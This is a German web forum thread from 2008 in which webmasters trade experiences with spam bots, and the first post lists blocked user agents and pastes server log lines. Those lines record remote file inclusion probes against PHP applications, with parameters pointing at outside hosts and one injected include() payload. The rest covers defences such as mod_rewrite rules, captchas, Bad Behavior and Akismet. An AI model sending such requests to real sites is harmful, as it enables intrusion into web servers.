[hemfrie]

In letzter Zeit finde ich vermehrt Logeinträge von Bots, die sich raffgierig über das Forum hermachen. Ich will den Thread hier mal nutzen um solche Bots aufzulisten, da evtl. der ein oder andere ebenfalls davon betroffen sein könnte.

Im Moment habe ich folgende (Spam)-Bots ausgesperrt:

• Whacker
• TMCrawler
• Java
• EmailCollector
• EmailSiphon
• EmailWolf
• Gigabot
• FileHound
• TurnitinBot
• JoBo
• adressendeutschland
• MJ12bot
• Twiceler

Am aktivsten davon sind der "Gigabot" und in den letzten Tagen "Twiceler".

Zu den ganzen Bots, die den Serverload ordentlich erhöhen, kommen noch die XSS Versuche.

Hier mal ein kleiner Logauszug davon:

Code:

66.70.14.90 - - [05/Apr/2008:09:39:51 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/images/banners/canboy? HTTP/1.1" 404 324 "-" "libwww-perl/5.79"
84.19.182.143 - - [05/Apr/2008:09:45:25 +0200] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://domain.tld/ioncube/readme.txt?? HTTP/1.1" 404 324 "-" "libwww-perl/5.79"
217.18.130.26 - - [05/Apr/2008:09:45:37 +0200] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://domain.tld/on.txt?????? HTTP/1.1" 404 324 "-" "libwww-perl/5.803"
80.238.225.165 - - [05/Apr/2008:09:47:25 +0200] "GET /50845-mod_rewrite-reihenfolge.html HTTP/1.1" 403 45936 "-" "libwww-perl/5.805"
80.238.225.165 - - [05/Apr/2008:09:47:26 +0200] "GET /index.php?l=http://domain.tld/members/.debug/id1.txt??? HTTP/1.1" 403 41422 "-" "libwww-perl/5.805"
213.203.223.115 - - [05/Apr/2008:10:00:23 +0200] "GET /51019-probleme-im-ie.html HTTP/1.1" 403 37792 "-" "libwww-perl/5.805"
213.203.223.115 - - [05/Apr/2008:10:00:23 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/.dat/idscan3.txt??? HTTP/1.1" 404 324 "-" "libwww-perl/5.805"
217.171.66.229 - - [05/Apr/2008:10:04:27 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/php5/id.txt??? HTTP/1.1" 404 324 "-" "libwww-perl/5.65"
64.15.138.183 - - [05/Apr/2008:10:05:54 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/php5/id.txt??? HTTP/1.1" 404 324 "-" "libwww-perl/5.808"
212.227.98.178 - - [05/Apr/2008:10:07:22 +0200] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://domain.tld/lia/bot/s.txt? HTTP/1.1" 404 324 "-" "libwww-perl/5.803"
217.18.130.26 - - [05/Apr/2008:10:20:20 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/on.txt?????? HTTP/1.1" 404 324 "-" "libwww-perl/5.803"
193.253.51.34 - - [05/Apr/2008:10:40:12 +0200] "GET //webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://domain.tld/images/.bash/indexfile.txt? HTTP/1.1" 404 324 "-" "libwww-perl/5.79"
193.253.51.34 - - [05/Apr/2008:10:40:28 +0200] "GET /42601-kleines-projekt-mykaoz-design-html-css.html//webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://domain.tld/images/.bash/indexfile.txt? HTTP/1.1" 404 324 "-" "libwww-perl/5.79"
204.185.158.220 - - [05/Apr/2008:10:44:20 +0200] "GET /index.php?include=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 403 41931 "-" "libwww-perl/5.803"
201.17.3.26 - - [05/Apr/2008:11:11:33 +0200] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://domain.tld/.ownz/safeon.dat?????????? HTTP/1.1" 301 549 "-" "libwww-perl/5.79"
201.17.3.26 - - [05/Apr/2008:11:11:35 +0200] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&a=http://domain.tld/.ownz/safeon.dat?????????? HTTP/1.1" 404 17335 "-" "libwww-perl/5.79"
80.238.225.165 - - [05/Apr/2008:11:16:59 +0200] "GET /50509-per-htaccess-script-php-ausf-hren.html/index.php?script=http://domain.tld/members/.debug/id1.txt??? HTTP/1.1" 301 373 "-" "libwww-perl/5.805"
80.238.225.165 - - [05/Apr/2008:11:16:59 +0200] "GET /index.php HTTP/1.1" 403 43477 "-" "libwww-perl/5.805"
80.238.225.165 - - [05/Apr/2008:11:17:00 +0200] "GET /index.php?script=http://domain.tld/members/.debug/id1.txt??? HTTP/1.1" 403 42679 "-" "libwww-perl/5.805"
80.238.225.165 - - [05/Apr/2008:11:22:41 +0200] "GET /50509-per-htaccess-script-php-ausf-hren.html/index.php?script=http://domain.tld/members/.debug/id1.txt? HTTP/1.1" 301 373 "-" "libwww-perl/5.805"
80.238.225.165 - - [05/Apr/2008:11:22:42 +0200] "GET /index.php HTTP/1.1" 403 43438 "-" "libwww-perl/5.805"
80.238.225.165 - - [05/Apr/2008:11:22:43 +0200] "GET /index.php?script=http://domain.tld/members/.debug/id1.txt? HTTP/1.1" 403 42703 "-" "libwww-perl/5.805"
201.17.3.26 - - [05/Apr/2008:11:24:22 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://domain.tld/.ownz/safeon.dat?????????? HTTP/1.1" 403 385 "-" "libwww-perl/5.79"
201.17.3.26 - - [05/Apr/2008:11:24:25 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://domain.tld/.ownz/safeon.dat?????????? HTTP/1.1" 403 385 "-" "libwww-perl/5.79"
74.208.111.178 - - [05/Apr/2008:11:26:41 +0200] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://domain.tld/images/stories/id2.txt?? HTTP/1.1" 404 324 "-" "libwww-perl/5.805"
213.239.195.243 - - [05/Apr/2008:11:33:11 +0200] "GET /includes/functions_portal.php?phpbb_root_path=http://domain.tld/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 324 "-" "libwww-perl/5.805"
201.86.201.202 - - [05/Apr/2008:11:37:44 +0200] "GET //index.php?option=com_content&task=view&id=&mosConfig_absolute_path=http://domain.tld/.ownz/safeon.dat?????????? HTTP/1.1" 403 42871 "-" "libwww-perl/5.803"
204.92.87.157 - - [05/Apr/2008:11:46:16 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/on.txt?????? HTTP/1.1" 404 324 "-" "libwww-perl/5.808"
83.68.228.146 - - [05/Apr/2008:11:47:27 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/on.txt?????? HTTP/1.1" 404 324 "-" "libwww-perl/5.805"
88.78.147.113 - - [05/Apr/2008:11:50:45 +0200] "GET / HTTP/1.1" 403 1382 "http://domain.tld/" "libwww-perl"
203.150.225.183 - - [05/Apr/2008:11:50:46 +0200] "GET //impex/ImpExModule.php?systempath=http://domain.tld/www/modul/d.txt??? HTTP/1.1" 403 1344 "-" "libwww-perl/5.79"
60.249.45.142 - - [05/Apr/2008:11:53:46 +0200] "GET //index.php?option=com_content&task=view&id=&mosConfig_absolute_path=http://domain.tld/on.txt?? HTTP/1.1" 403 1344 "-" "libwww-perl/5.79"

libwww-perl hab ich ebenfalls komplett ausgesperrt, da damit zu 95% Unsinn versucht wird.

Wie sind Eure Erfahrungen mit ungewollten Besuchern?
Kennt Ihr noch andere Bots, die Euch schon den Server breitgefahren haben?

[Crizzo]

Ich hatte bei mir im Forum und beim Kontaktformular-Bots, die gespammt haben.
Beim Forum hab ich den Gästen das "posten" verboten und das Kontaktformular bekam ein "denk-Captcha" und nun ging es.
Ich wüsste jetzt nicht, wo ich sehen sollte, wie die Bots hießen bzw. wie man sie dann aussperren könnte.

[hemfrie]

Zitat:

Zitat von BlackHawk

Ich wüsste jetzt nicht, wo ich sehen sollte, wie die Bots hießen bzw. wie man sie dann aussperren könnte.

Das ist unterschiedlich, je nachdem ob Du ein Webpaket oder einen Server mit Rootzugriff hast.

Bei normalen Webpaketen werden die Logdateien meistens irgendwo in der Webadministration verlinkt. In der access_log Datei findest Du dann sämtliche Zugriffe auf Deine Webseite.

Aussperren kann man die Bots mit Hilfe von mod_rewrite:
Bots & Spider per mod_rewrite aussperren - huschi.net

Wobei die Methode zwar meistens hilft aber keinen 100% Schutz bietet. User-Agents kann man nunmal beliebig verändern.
Deswegen sollte man regelmäßig die Logs durchstöbern um einen Überblick über aktuelle Bots zu erhalten.

[Dieter]

Hallo, Dirk!

Meine Logdateien inspiziere ich ziemlich regelmäßig und seit ich mich etwas intensiver mit dem von Dir geschilderten Problem befasst habe, steht mein Entschluss, kein "well known CMS" zu verwenden, noch stabiler als bisher!

Handgedengeltes HTML mit einer kleinen (unvermeidlichen) Prise PHP ist weniger angreifbar!

Besonderes Interesse rufen bei meiner Seite im übrigen die Formulare hervor: Kontakt, Suche und Gästebuch. Da beißen sich die Spammer (bisher) aber die Zähne dran aus.

Und die Aufmerksamkeit wegen der Kinder(zeichnungen) war glücklicherweise (nach einer Umbenennung) nur eine temporäre.

[hemfrie]

Zitat:

Zitat von Dieter

Hallo, Dirk!

Meine Logdateien inspiziere ich ziemlich regelmäßig und seit ich mich etwas intensiver mit dem von Dir geschilderten Problem befasst habe, steht mein Entschluss, kein "well known CMS" zu verwenden, noch stabiler als bisher!

Darüber lässt sich sicher streiten. Einerseits sind bekannte und weit verbreitete Webanwendungen natürlich sehr im Fokus von Hackern, Scriptkiddies etc.

Andererseits werden solche Anwendungen von mehreren Leuten programmiert und von sehr vielen Menschen eingesetzt. Nach dem Motto "mehrere Augen sehen mehr" werden Sicherheitslücken meist sehr schnell gefunden und gefixt.

Gefährlich und fahrlässig ist es nur, wenn Webmaster nach bekannt werden solcher Sicherheitslücken ihre Software nicht mit den entsprechenden Updates und fixes sichern.

[Dieter]

Hallo, Dirk!

Ein ziemlicher Nachteil bei bekannter Foren-, Board- und CMS-Software ist der Umstand, dass sie "von weitem" erkennbar ist. Herkunftshinweise in Meta-Tags und Werbelinks laden doch gerade dazu ein, an bekannten Schwachstellen anzusetzen.

Dass wir uns nicht falsch verstehen: die Schuld liegt nicht bei den in aller Regel auch um Sicherheit bemühten Autoren der Software - sondern einzig und allein bei den erstaunlich vielen Gaunern auf dieser schönen Welt!

[laborix]

Zitat:

Zitat von hemfrie

Wie sind Eure Erfahrungen mit ungewollten Besuchern?

Ein Forum habe ich nicht, aber zwei Blogs. Und in beiden Blogs ist Bad-Behavior aktiv. Blockt so ziemlich alles was nach Spammer oder so was aussieht.

Bad Behavior / Bad Behaviour: Home

Ob man das für das Forum einsetzen kann, weiss ich nicht. Aber die "default" Konfiguration läßt sich mittels PHP in jeder Webseite aktivieren. Kannst du dir ja mal anschauen, ob das eventuell etwas für das Forum wäre

[hemfrie]

Zitat:

Zitat von laborix

Ein Forum habe ich nicht, aber zwei Blogs. Und in beiden Blogs ist Bad-Behavior aktiv. Blockt so ziemlich alles was nach Spammer oder so was aussieht.

Bad Behavior / Bad Behaviour: Home

Ob man das für das Forum einsetzen kann, weiss ich nicht. Aber die "default" Konfiguration läßt sich mittels PHP in jeder Webseite aktivieren. Kannst du dir ja mal anschauen, ob das eventuell etwas für das Forum wäre

Danke Dir für den Link.

Ich werde das auch mal mit meinem Blog testen. Im Moment hab ich Akismet im Einsatz, aber das arbeitet natürlich ganz anders. Es lässt den Spam erst durch um ihn dann zu identifizieren.

Die Türsteher-Methode ist da auf jeden Fall schlauer

[laborix]

Zitat:

Zitat von hemfrie

Im Moment hab ich Askimet im Einsatz, aber das arbeitet natürlich ganz anders. Es lässt den Spam erst durch um ihn dann zu identifizieren.

Mit Bad-Behavior hatte Akismet bei mir lange Zeit "Urlaub". Also beide in Kombination sorgen für ein "gemütliches Bloggen" ohne viel Ärger. Bad Behavior sortiert bei mir etwas mehr als 98% aus, den Rest macht Akismet

[hemfrie]

Zitat:

Zitat von laborix

Mit Bad-Behavior hatte Akismet bei mir lange Zeit "Urlaub". Also beide in Kombination sorgen für ein "gemütliches Bloggen" ohne viel Ärger. Bad Behavior sortiert bei mir etwas mehr als 98% aus, den Rest macht Akismet

Klingt gut

Akismet arbeitet bei mir zwar recht gut, aber im Grunde nervt es mich schon, wenn ich dort täglich x-Spameinträge in der Kommentar-Verwaltung moderieren muss.

Das wird eine gute Testumgebung für BB *g*